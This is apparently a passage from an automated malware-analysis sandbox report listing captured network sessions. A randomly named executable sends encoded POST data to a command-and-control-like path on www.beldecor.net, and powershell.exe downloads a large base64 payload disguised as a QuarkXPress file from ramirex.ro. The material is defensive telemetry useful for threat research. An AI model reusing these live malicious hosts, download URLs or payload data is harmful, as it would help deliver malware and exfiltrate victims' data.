                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 5a 38 46 7a 4b 39 2f 47 6d 69 4c 37 31 53 4d 54 56 78 2b 45 51 79 4c 54 74 45 56 74 49 4e 6e 4c 36 35 57 63 66 70 43 77 51 66 54 76 64 4d 64 58 44 64 48 73 47 36 44 57 7a 2b 74 69 30 5a 30 4e 52 51 30 56 56 58 67 31 64 54 78 69 7a 76 73 6b 51 62 72 5a 46 48 41 51 68 31 48 43 53 66 51 71 38 7a 36 5a 31 73 5a 51 46 6c 31 74 39 6a 52 4b 68 50 36 53 45 37 44 6b 48 71 72 4d 64 4b 69 4c 74 32 6a 73 69 4f 4c 67 68 73 7a 43 67 47 70 30 58 53 55 2f 4c 6d 65 4f 64 77 45 4f 37 6f 58 5a 32 49 48 53 41 6b 43 2b 68 31 6b 45 62 39 57 37 77 46 4a 33 53 39 70 37 51 6d 58 7a 32 51 4b 76 68 79 46 2b 73 4e 44 74 46 39 50 45 55 78 44 41 67 77 3d 3d
                                                Data Ascii: Of5HNz9=Z8FzK9/GmiL71SMTVx+EQyLTtEVtINnL65WcfpCwQfTvdMdXDdHsG6DWz+ti0Z0NRQ0VVXg1dTxizvskQbrZFHAQh1HCSfQq8z6Z1sZQFl1t9jRKhP6SE7DkHqrMdKiLt2jsiOLghszCgGp0XSU/LmeOdwEO7oXZ2IHSAkC+h1kEb9W7wFJ3S9p7QmXz2QKvhyF+sNDtF9PEUxDAgw==
                                                Jun 1, 2024 19:59:38.528461933 CEST1046INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Encoding: gzip
                                                Data Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 62 c7 dd 66 53 db 40 1b bb 88 81 b4 09 12 15 45 8e 14 39 b2 88 50 a4 4a 52 51 0c ec 1f ca 79 7f 42 fe d8 0e 45 3b 9b 7e 9d 64 92 f3 de 9b 79 33 e3 f9 9b d5 d5 79 71 77 bd 86 8b e2 f3 25 5c 7f fd 78 b9 39 87 24 cd f3 6f 27 e7 79 be 2a 56 f1 61 96 1d 4f f2 7c fd 25 81 a4 f6 be 3d cb f3 be ef b3 fe 24 33 76 9b 17 37 79 ed 1b 35 cb 9d b7 92 fb 4c 78 91 2c 47 f3 70 07 8a e9 ed 22 a9 ec 70 81 4c d0 7d 83 9e 41 60 49 f1 7b 27 1f 16 c9 b9 d1 1e b5 4f 8b 5d 8b 09 f0 78 5a 24 1e 1f fd 40 fc 1e 78 cd ac 43 bf e8 7c 95 9e 06 aa 81 43 b3 06 17 89 35 a5 f1 ee 15 4e 1b 8d 63 6d a4 16 f8 48 df ca 28 65 fa 17 d0 6b 61 ce 78 8d 69 10 b4 46 fd c0 90 0e 4f bf 05 b5 96 6d 1b f6 87 e8 62 53 5c ae 97 b3 e3 19 7c 31 1e 3e 99 4e 8b 79 1e 2f 47 f3 fc 62 fd 61 45 c9 7f bc 5a dd d1 e7 62 b2 7c 15 44 a7 51 51 23 58 32 05 9d 47 01 c2 f0 ae 21 5f a0 67 0e 34 d1 55 81 0e 8c 06 5f 4b 07 0e ed 03 da 6c 34 bf 0e 5c 37 07 42 0d 85 35 dd c3 f3 13 [TRUNCATED]
                                                Data Ascii: 36buTMo8WLubfS@E9PJRQyBE;~dy3yqw%\x9$o'y*VaO|%=$3v7y5Lx,Gp"pL}A`I{'O]xZ$@xC|C5NcmH(ekaxiFOmbS\|1>Ny/GbaEZb|DQQ#X2G!_g4U_Kl4\7B5%#aZ<?>bu8FWbX)&L^j(GJ8cBAv9%iJT9k\-Rwfu%odNOg_N.aM 2wyT1|g*5 }\!YJ*d42ZZL1\#:raJ%cp-rYIN])$*Ln e]H{VwND!2Pq)&D{hJr>VtpIE niT^eu5ED+)E?0e6Pn[vfmc37UxF#&75H)Tm38,2ahT&P1-)]-FjtQqh-;Qlz+#E=!0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749716193.37.145.73806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:40.239559889 CEST754OUTPOST /abt9/ HTTP/1.1
                                                Host: www.beldecor.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.beldecor.net
                                                Referer: http://www.beldecor.net/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 240
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 5a 38 46 7a 4b 39 2f 47 6d 69 4c 37 30 7a 38 54 53 57 71 45 52 53 4c 55 68 6b 56 74 43 74 6e 48 36 35 61 63 66 6f 32 67 51 73 37 76 64 70 78 58 52 6f 6e 73 4c 61 44 57 37 65 74 64 2b 35 30 61 52 51 77 72 56 56 6b 31 64 51 4e 69 7a 72 6f 6b 51 70 44 61 45 58 41 6f 70 56 48 41 64 2f 51 71 38 7a 36 5a 31 76 6b 33 46 6d 46 74 39 58 56 4b 67 74 43 52 61 72 44 6c 58 36 72 4d 5a 4b 69 48 74 32 6a 65 69 50 6e 4b 68 75 4c 43 67 44 56 30 55 44 55 34 45 6d 65 49 51 51 46 65 30 64 6d 30 77 64 6e 75 42 31 32 6e 6b 6d 59 62 54 72 4c 5a 71 6e 46 62 4d 73 52 41 55 6b 7a 46 68 32 58 61 6a 7a 42 6d 68 76 33 4d 61 4b 71 75 5a 6a 69 45 32 42 74 56 68 44 74 76 78 77 77 50 59 63 48 4d 6e 55 4e 64 78 34 6f 3d
                                                Data Ascii: Of5HNz9=Z8FzK9/GmiL70z8TSWqERSLUhkVtCtnH65acfo2gQs7vdpxXRonsLaDW7etd+50aRQwrVVk1dQNizrokQpDaEXAopVHAd/Qq8z6Z1vk3FmFt9XVKgtCRarDlX6rMZKiHt2jeiPnKhuLCgDV0UDU4EmeIQQFe0dm0wdnuB12nkmYbTrLZqnFbMsRAUkzFh2XajzBmhv3MaKquZjiE2BtVhDtvxwwPYcHMnUNdx4o=
                                                Jun 1, 2024 19:59:41.053061008 CEST1046INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Encoding: gzip
                                                Data Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 b2 ec d8 5b b4 a9 6d a0 8d bd 88 81 b4 09 12 15 45 8e b4 38 b2 88 50 a4 96 1c 45 31 d0 3f 94 f3 fe 84 fc b1 1d 8a 76 9a 7e ec 49 26 39 ef bd 99 37 33 9e bf 59 5d 9d e7 77 d7 6b b8 c8 3f 5f c2 f5 d7 4f 97 9b 73 48 d2 2c fb 36 3d cf b2 55 be 8a 0f b3 d1 78 92 65 eb 2f 09 24 15 51 73 96 65 5d d7 8d ba e9 c8 ba 5d 96 df 64 15 d5 7a 96 79 72 aa a0 91 24 99 2c 07 f3 70 07 5a 98 dd 22 29 5d 7f 81 42 f2 7d 8d 24 20 b0 a4 f8 4f ab 1e 16 c9 b9 35 84 86 d2 7c df 60 02 45 3c 2d 12 c2 47 ea 89 3f 40 51 09 e7 91 16 2d 95 e9 bb 40 d5 73 18 51 e3 22 71 76 6b c9 bf c2 19 6b 70 68 ac 32 12 1f f9 5b 5a ad 6d f7 02 7a 2d 5c 88 a2 c2 34 08 3a ab 7f 62 48 fb a7 3f 82 1a 27 76 b5 f8 9f e8 7c 93 5f ae 97 b3 f1 0c be 58 82 bf 6d 6b e4 3c 8b 97 83 79 76 b1 fe b8 e2 e4 3f 5d ad ee f8 73 31 59 be 0a e2 d3 20 af 10 1c 9b 82 9e 50 82 b4 45 5b b3 2f d0 09 0f 86 e9 ca 40 07 d6 00 55 ca 83 47 f7 80 6e 34 98 5f 07 ae 9b 23 a1 81 dc d9 f6 e1 f9 89 [TRUNCATED]
                                                Data Ascii: 36buTMo8WLu[mE8PE1?v~I&973Y]wk?_OsH,6=Uxe/$Qse]]dzyr$,pZ")]B}$ O5|`E<-G?@Q-@sQ"qvkkph2[Zmz-\4:bH?'v|_Xmk<yv?]s1Y PE[/@UGn4_#HO`N4LD|C<AwJHZSe/PPOju]n@p<\[7Hm}wQl6}+oXb6NgdaM Z#~U%A~)Y_@]%%j/Y0q`Sr@-#F+YwFeju2`JUiA#MNB?]g1>byA5;BD!2Pal[EYLQ=,U;EEhQFD9;5|2<(iK!O^nh5fsBwbfAhlB?xV1:o}9Uh<}GcGdv\mV,7ahbP1/)PCP}M(mOtXSx1H.QN50


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.749717193.37.145.73806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:42.770765066 CEST1767OUTPOST /abt9/ HTTP/1.1
                                                Host: www.beldecor.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.beldecor.net
                                                Referer: http://www.beldecor.net/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1252
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 5a 38 46 7a 4b 39 2f 47 6d 69 4c 37 30 7a 38 54 53 57 71 45 52 53 4c 55 68 6b 56 74 43 74 6e 48 36 35 61 63 66 6f 32 67 51 71 6a 76 64 2f 6c 58 41 35 6e 73 4b 61 44 57 78 2b 74 6d 2b 35 30 69 52 51 49 52 56 56 6f 6c 64 57 4a 69 31 4f 38 6b 55 6f 44 61 4b 58 41 6f 6c 31 48 42 53 66 51 7a 38 7a 71 64 31 76 30 33 46 6d 46 74 39 52 35 4b 6e 2f 36 52 59 72 44 6b 48 71 72 51 64 4b 69 72 74 32 72 6b 69 50 6a 77 68 64 44 43 68 69 6c 30 57 78 73 34 4e 6d 65 4b 52 51 45 62 30 64 69 33 77 64 54 4d 42 31 79 64 6b 6c 49 62 5a 74 4f 7a 39 47 4e 41 66 2b 68 64 55 33 4b 69 70 32 44 4e 35 44 46 62 73 50 33 63 45 39 6d 37 5a 51 43 78 2f 55 49 44 35 51 77 52 33 52 30 4a 4f 38 36 42 37 6b 70 37 71 64 71 69 47 33 65 37 74 71 32 58 53 78 44 43 32 46 76 66 4f 6e 67 38 71 4e 49 43 42 73 4d 4b 4f 72 76 39 48 5a 6f 52 52 54 66 61 38 46 66 7a 63 48 74 62 58 6a 32 38 75 68 75 7a 75 4e 72 4d 48 41 34 6b 6d 66 4d 78 6b 55 64 32 49 6c 52 75 75 71 76 6b 48 33 6b 54 6f 4b 77 30 79 36 34 56 58 64 49 53 50 53 [TRUNCATED]
                                                Data Ascii: Of5HNz9=Z8FzK9/GmiL70z8TSWqERSLUhkVtCtnH65acfo2gQqjvd/lXA5nsKaDWx+tm+50iRQIRVVoldWJi1O8kUoDaKXAol1HBSfQz8zqd1v03FmFt9R5Kn/6RYrDkHqrQdKirt2rkiPjwhdDChil0Wxs4NmeKRQEb0di3wdTMB1ydklIbZtOz9GNAf+hdU3Kip2DN5DFbsP3cE9m7ZQCx/UID5QwR3R0JO86B7kp7qdqiG3e7tq2XSxDC2FvfOng8qNICBsMKOrv9HZoRRTfa8FfzcHtbXj28uhuzuNrMHA4kmfMxkUd2IlRuuqvkH3kToKw0y64VXdISPStmFzNwneySoXX+z+TLFK58rsBQcSeOPkihnGDV7yWxPR8I/ezuJ/w6SuEt5QPEBuJ4FJivIb6k+B42cPqJSTM+eoK5H+9rp0/sCcBuraUHZ5YzYHO/hWbv234HbkDEUGaDrfy3sJsKf+VfpIgidTk4ze76wJS65Y1e+44lbw3+maU+8OY4R9J5VltaOD3IZAWrDyrheBGapJp2r3Bx8nO8Ple7Gh3MZXFBCpKR4sDAjNFdt8VeyjGPZyAG0rNDgX84M3KVqxx2T01yB17chWQXQU7aReNZy+FnvPViD518ofDVdgkbzFvK/hoMIs5Rlyd2lLmOmWQ5ZbLcl0HSY7nBOCDEQZQ7d3WNQXIu+kRIl+Bpnn2oiU54EKY1lvPZ+pTdmMNa6STq4OmBE0pfeez8W2xgE/iw96+2vfzMJg48+RA+FZVpzbwzniHMZ9SJqEbIwRci6OnIVn9MKY6TWq4IY0dgOBseyydYDCRtR3XFaCV+9B69AlBWE9IAt/RU1xFCNQ0QwIeqCNAa7YM/2DbnEPJg+SEPqkACZq1skJR01kxSkdI2+ru4p3zQ/EKRzJpEU45qnyOye5Z3hhYc5SGNvzJlMHDb2G2aXFxgi9NE+DwwdWTlAaYQADXlfuc/fF3TDjROmk0KsvC1FRHQrqDyuzfLrrf9mVxm [TRUNCATED]
                                                Jun 1, 2024 19:59:43.597502947 CEST1045INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Encoding: gzip
                                                Data Raw: 33 36 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 b2 9c 26 86 9b d4 36 d0 c6 5e c4 40 da 04 89 8a 22 47 9a 1a 59 44 28 52 4b 8e a2 18 d8 3f 94 f3 fe 84 fc b1 1d 8a 76 36 fd 3a c9 24 e7 bd 37 f3 66 c6 b3 77 cb eb 8b fc fe 66 05 97 f9 97 2b b8 f9 f6 f9 6a 7d 01 49 9a 65 df 4f 2e b2 6c 99 2f e3 c3 e9 68 7c 9c 65 ab af 09 24 15 51 73 9e 65 5d d7 8d ba 93 91 75 db 2c bf cd 2a aa f5 69 e6 c9 29 49 a3 82 8a 64 31 98 85 3b d0 c2 6c e7 49 e9 fa 0b 14 05 df d7 48 02 02 4b 8a 7f b7 ea 71 9e 5c 58 43 68 28 cd 77 0d 26 20 e3 69 9e 10 3e 51 4f fc 11 64 25 9c 47 9a b7 54 a6 1f 02 55 cf 61 44 8d f3 c4 d9 8d 25 ff 06 67 ac c1 a1 b1 ca 14 f8 c4 df d2 6a 6d bb 57 d0 5b 61 29 64 85 69 10 74 56 ff c0 90 f6 4f bf 05 35 4e 6c 6b f1 87 e8 7c 9d 5f ad 16 a7 e3 53 f8 6a 09 fe b2 ad 29 66 59 bc 1c cc b2 cb d5 a7 25 27 ff f9 7a 79 cf 9f cb e3 c5 9b 20 3e 0d f2 0a c1 b1 29 e8 09 0b 28 ac 6c 6b f6 05 3a e1 c1 30 5d 19 e8 c0 1a a0 4a 79 f0 e8 1e d1 8d 06 b3 9b c0 75 7b 20 34 90 3b db 3e be 3c [TRUNCATED]
                                                Data Ascii: 36auTMo8WLu&6^@"GYD(RK?v6:$7fwf+j}IeO.l/h|e$Qse]u,*i)Id1;lIHKq\XCh(w& i>QOd%GTUaD%gjmW[a)ditVO5Nlk|_Sj)fY%'zy >)(lk:0]Jyu{ 4;><S^</`4LL|C<J+;%WZIE2`~A('Vry[@p<\J7H/9r:>cl3L&c,p"*6-/4@LiF(%A~`}R#[JJ:^av!S![F`WC-75!BdAJ% L{6lElW;h (DY9MK3kv<!J>B[S$+FkED$XA'#qpny*p $.QZ@N=s l#mU(*40F@gz/{#<E1D-W[+;M+67l0zDX,TKP+c7n>I"Vwj[/f)?|0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.749718193.37.145.73806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:45.301719904 CEST468OUTGET /abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJ HTTP/1.1
                                                Host: www.beldecor.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Jun 1, 2024 19:59:46.116954088 CEST1236INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Accept-Ranges: bytes
                                                Data Raw: 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 [TRUNCATED]
                                                Data Ascii: 5f9<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.beldecor.net | Powered by www.lws.fr | ID: a2afa7cf04bf03aafb1b763300764289</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own erro [TRUNCATED]
                                                Jun 1, 2024 19:59:46.116990089 CEST457INData Raw: 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f
                                                Data Ascii: nd switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround
                                                Jun 1, 2024 19:59:46.120230913 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749700188.215.50.154436600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-06-01 17:57:42 UTC170OUTGET /Rutschebanes.qxd HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: ramirex.ro
                                                Connection: Keep-Alive
                                                2024-06-01 17:57:42 UTC365INHTTP/1.1 200 OK
                                                Date: Sat, 01 Jun 2024 17:57:42 GMT
                                                Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                                                Last-Modified: Sun, 26 May 2024 15:12:56 GMT
                                                ETag: "26600d4-66eac-6195cd5e836f3"
                                                Accept-Ranges: bytes
                                                Content-Length: 421548
                                                Connection: close
                                                Content-Type: application/vnd.quark.quarkxpress
                                                2024-06-01 17:57:42 UTC16384INData Raw: 36 77 4c 50 69 2b 73 43 4a 38 57 37 71 48 38 4d 41 4f 73 43 6a 48 74 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 66 30 47 7a 48 72 72 41 73 71 52 63 51 47 62 67 66 45 78 42 68 30 47 36 77 49 64 68 75 73 43 6f 67 36 42 36 63 77 41 30 58 7a 72 41 73 5a 38 36 77 4a 59 2b 2b 73 43 57 66 72 72 41 69 67 5a 75 6a 78 2b 68 68 48 72 41 72 62 4c 36 77 4a 33 41 6e 45 42 6d 2b 73 43 74 68 30 78 79 6e 45 42 6d 2b 73 43 6b 58 75 4a 46 41 76 72 41 6e 36 43 63 51 47 62 30 65 4c 72 41 69 55 59 36 77 4b 49 52 34 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 47 49 4f 66 41 33 7a 4c 36 77 49 51 61 48 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 41 30 58 72 41 70 6e 5a 67 63 4e 53 79 66 34 41 63 51 47 62 63 51 47 62 75 6e 74 31 62 32 42 78 41 5a 76
                                                Data Ascii: 6wLPi+sCJ8W7qH8MAOsCjHtxAZsDXCQEcQGbcQGbuf0GzHrrAsqRcQGbgfExBh0G6wIdhusCog6B6cwA0XzrAsZ86wJY++sCWfrrAigZujx+hhHrArbL6wJ3AnEBm+sCth0xynEBm+sCkXuJFAvrAn6CcQGb0eLrAiUY6wKIR4PBBHEBm3EBm4H5GIOfA3zL6wIQaHEBm4tEJARxAZtxAZuJw+sCA0XrApnZgcNSyf4AcQGbcQGbunt1b2BxAZv
                                                2024-06-01 17:57:42 UTC16384INData Raw: 47 70 71 44 2b 5a 64 44 56 74 61 47 33 2f 34 58 72 39 70 53 35 4b 41 64 59 33 69 6a 73 53 4c 67 54 6e 6d 44 2b 66 4e 68 75 47 34 77 75 61 39 77 39 6e 76 6f 4b 64 30 68 78 6e 6b 66 69 41 6c 44 4f 50 6f 6c 34 33 30 65 34 63 30 39 63 36 47 4c 59 4a 75 59 71 4c 70 54 33 65 51 51 2f 39 6c 4a 42 4b 46 4a 56 4d 38 44 4c 76 4f 6c 62 58 7a 65 4c 6e 74 73 49 35 59 64 59 2b 53 67 75 32 48 4a 75 4c 5a 2f 49 65 73 69 4c 44 6c 59 54 42 57 64 4e 77 72 4c 48 6f 37 6e 2b 70 48 45 42 51 68 4f 71 6f 5a 77 78 55 7a 32 55 79 49 69 46 71 48 73 6f 45 72 63 4e 43 57 67 57 47 56 58 31 5a 50 47 30 5a 79 6b 44 43 74 39 31 72 49 38 6c 49 58 74 6e 6f 44 6e 50 39 41 58 66 37 65 30 44 7a 51 2f 47 43 36 41 67 43 5a 79 4e 56 4e 78 41 39 65 72 4c 75 54 70 56 44 6b 65 72 58 56 45 57 7a 6c
                                                Data Ascii: GpqD+ZdDVtaG3/4Xr9pS5KAdY3ijsSLgTnmD+fNhuG4wua9w9nvoKd0hxnkfiAlDOPol430e4c09c6GLYJuYqLpT3eQQ/9lJBKFJVM8DLvOlbXzeLntsI5YdY+Sgu2HJuLZ/IesiLDlYTBWdNwrLHo7n+pHEBQhOqoZwxUz2UyIiFqHsoErcNCWgWGVX1ZPG0ZykDCt91rI8lIXtnoDnP9AXf7e0DzQ/GC6AgCZyNVNxA9erLuTpVDkerXVEWzl
                                                2024-06-01 17:57:42 UTC16384INData Raw: 6b 73 50 6f 71 66 79 6e 73 6e 69 6a 69 54 4e 63 56 6c 79 50 46 4a 56 68 6d 73 73 69 4b 44 43 73 61 2b 74 57 2b 4d 46 62 64 38 6d 72 7a 43 35 30 4b 51 55 7a 79 43 49 68 70 42 63 5a 39 4e 4b 54 79 33 65 51 4f 41 37 52 79 61 37 35 32 79 59 46 56 52 78 69 6b 44 43 43 37 73 47 37 69 68 34 41 4f 55 77 4d 6b 63 37 43 47 4a 6d 32 48 56 57 47 50 69 6f 37 44 4f 58 64 59 4f 54 49 79 67 79 76 69 42 4b 6b 31 6a 38 64 59 2b 53 67 74 52 57 6d 32 33 4d 70 49 66 4a 4c 36 50 67 79 35 58 38 45 41 4a 59 4a 4c 51 2f 6f 4a 36 59 55 34 74 6e 46 49 53 6c 48 2f 42 6f 39 65 65 75 68 43 30 33 6b 6f 42 31 6a 59 52 37 57 34 34 57 7a 6e 46 66 41 48 4b 62 36 45 53 45 70 52 35 50 4f 37 36 53 30 47 4c 6b 5a 34 64 6b 6f 39 35 47 71 4b 57 59 30 55 65 33 52 73 6a 79 55 68 65 32 6d 67 4f 63
                                                Data Ascii: ksPoqfynsnijiTNcVlyPFJVhmssiKDCsa+tW+MFbd8mrzC50KQUzyCIhpBcZ9NKTy3eQOA7Rya752yYFVRxikDCC7sG7ih4AOUwMkc7CGJm2HVWGPio7DOXdYOTIygyviBKk1j8dY+SgtRWm23MpIfJL6Pgy5X8EAJYJLQ/oJ6YU4tnFISlH/Bo9eeuhC03koB1jYR7W44WznFfAHKb6ESEpR5PO76S0GLkZ4dko95GqKWY0Ue3RsjyUhe2mgOc
                                                2024-06-01 17:57:42 UTC16384INData Raw: 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 4b 2f 61 56 47 32 67 48 57 50 6b 41 76 67 33 6c 30 4b 37 2f 42 6e 58 56 57 37 4f 31 52 78 37 4c 45 34 54 56 6d 67 61 51 6e 71 45 41 6d 45 30 2b 32 41 68 56 4f 33 68 30 5a 42 69 50 52 33 79 50 41 36 47 4b 72 71 51 64 2b 2b 69 62 70 54 75 78 36 49 64 59 31 30 2b 4a 48 74 6e 38 4b 56 52 2f 71 62 4f 5a 68 33 6e 4f 6d 2f 4a 31 45 70 4f 4f 79 6b 74 36 6f 34 52 31 79 5a
                                                Data Ascii: KAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKK/aVG2gHWPkAvg3l0K7/BnXVW7O1Rx7LE4TVmgaQnqEAmE0+2AhVO3h0ZBiPR3yPA6GKrqQd++ibpTux6IdY10+JHtn8KVR/qbOZh3nOm/J1EpOOykt6o4R1yZ
